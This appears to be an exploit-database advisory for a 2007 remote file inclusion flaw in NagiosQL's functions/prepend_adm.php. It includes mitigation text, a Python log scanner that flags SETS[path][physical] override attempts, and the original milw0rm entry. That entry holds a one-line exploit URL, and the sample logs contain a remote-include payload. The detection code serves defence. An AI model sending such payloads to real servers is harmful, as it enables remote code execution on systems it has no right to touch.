vendor: NagiosQL
by: ThE TiGeR
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: Not provided
Product Name: NagiosQL
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

NagiosQL Remote file inclusion

This exploit allows an attacker to include a remote file in the NagiosQL application. By manipulating the SETS[path][physical] request parameter of functions/prepend_adm.php, the attacker can execute arbitrary code or gain unauthorized access to the system. The vulnerability was discovered by ThE TiGeR.

Mitigation:

Apply the latest patches and updates for NagiosQL. Ensure that the application is properly configured and access to sensitive files is restricted.
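
Added example, not part of the original advisory or of NagiosQL: a log check that flags requests whose query string tries to supply the SETS array described above, including URL-encoded brackets. The log lines, host names and the combined log format are constructed assumptions; only the script path and parameter name come from this page.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/May/2007:10:01:02 +0000] "GET /nagiosql/functions/'
    'prepend_adm.php?SETS[path][physical]=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/May/2007:10:01:09 +0000] "GET /nagiosql/functions/'
    'prepend_adm.php?SETS%5Bpath%5D%5Bphysical%5D=x HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/May/2007:10:02:00 +0000] "GET /nagiosql/index.php?page=hosts HTTP/1.1" 200 2048',
    '192.0.2.10 - - [14/May/2007:10:02:05 +0000] "POST /nagiosql/admin/hosts.php HTTP/1.1" 302 0',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A parameter named SETS or SETS[...] is a client trying to supply the settings array.
SETS_NAME_RE = re.compile(r'^SETS(\[|$)')
REMOTE_VALUE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def sets_overrides(target):
    """Return decoded (name, value) query pairs that try to set SETS[...]."""
    query = target.partition('?')[2]
    pairs = parse_qsl(query, keep_blank_values=True)  # also decodes %5B / %5D
    return [(name, value) for name, value in pairs if SETS_NAME_RE.match(name)]


def scan(lines):
    """Return one finding per SETS override seen in the query strings."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable request line
        client, target = match.groups()
        for name, value in sets_overrides(target):
            findings.append({
                'client': client,
                'path': target.partition('?')[0],
                'param': name,
                'remote_value': bool(REMOTE_VALUE_RE.match(value)),
            })
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a SETS value sent in a POST body or cookie would not appear in this check.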

Exploit-DB raw data:

#NagiosQL Remote file inclusion

#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz

#Thanks str0ke

#Exploit :

#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-14]